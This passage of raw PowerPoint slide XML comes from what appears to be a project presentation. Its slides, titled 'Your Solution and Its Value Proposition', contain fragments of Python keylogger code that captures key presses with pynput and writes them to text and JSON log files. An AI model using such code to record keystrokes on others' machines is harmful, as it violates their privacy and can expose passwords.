                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-347" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </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1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="58" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-296" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-66" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="171" name="object 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="6467400"/>
            <a:ext cx="2142720" cy="199800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="173" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="22"/>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F155E9A7-8DF2-4F2D-B600-1E0C8B1C65F5}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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74" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882880" y="1433160"/>
            <a:ext cx="9219960" cy="53017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Calibri"/>
              </a:rPr>
              <a:t>import tkinter as tk</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from tkinter import *</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from pynput import keyboard</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import json</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keys_used = []</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flag = False</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keys = ""</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def generate_text_log(key):</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with open('key_log.txt', "w+") as keys:</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keys.write(key)</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def generate_json_file(keys_used):</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with open('key_log.json', '+wb') as key_log:</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key_list_bytes = json.dumps(keys_used).encode()</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key_log.write(key_list_bytes)</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5" name="object 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1476360"/>
            <a:ext cx="2695320" cy="3247560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176"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77"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78"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79" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558000" y="857880"/>
            <a:ext cx="9762840" cy="1158480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-41" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-347" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </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1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="58" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-296" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-66" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3600" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="180" name="object 7" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="676440" y="6467400"/>
            <a:ext cx="2142720" cy="199800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="181" name="object 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="739800" y="6473160"/>
            <a:ext cx="179856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solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="23"/>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55573504-B0CE-4B9F-862C-9D68D94C6113}" type="slidenum">
              <a:rPr b="0" lang="en-US" sz="1100" spc="9"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83" name="TextBox 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2882880" y="1433160"/>
            <a:ext cx="9219960" cy="4204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Calibri"/>
              </a:rPr>
              <a:t>def on_press(key):</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global flag, keys_used, keys</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if flag == False:</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keys_used.append(</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{'Pressed': f'{key}'}</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flag = True</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if flag == True:</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keys_used.append(</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{'Held': f'{key}'}</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generate_json_file(keys_used)</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4" name="object 2" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1476360"/>
            <a:ext cx="2695320" cy="3247560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="185"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86"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87"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88" name="PlaceHolder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558000" y="857880"/>
            <a:ext cx="9762840" cy="1158480"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" rIns="0" tIns="13320" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="12600" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-41" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="4" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</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9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-347" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-7" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>N</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </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1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="58" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-296" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>V</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-35" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>LU</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-66" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-32" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>R</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="-15" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="9" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en-US" sz="3600" spc="24" strike="noStrike">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
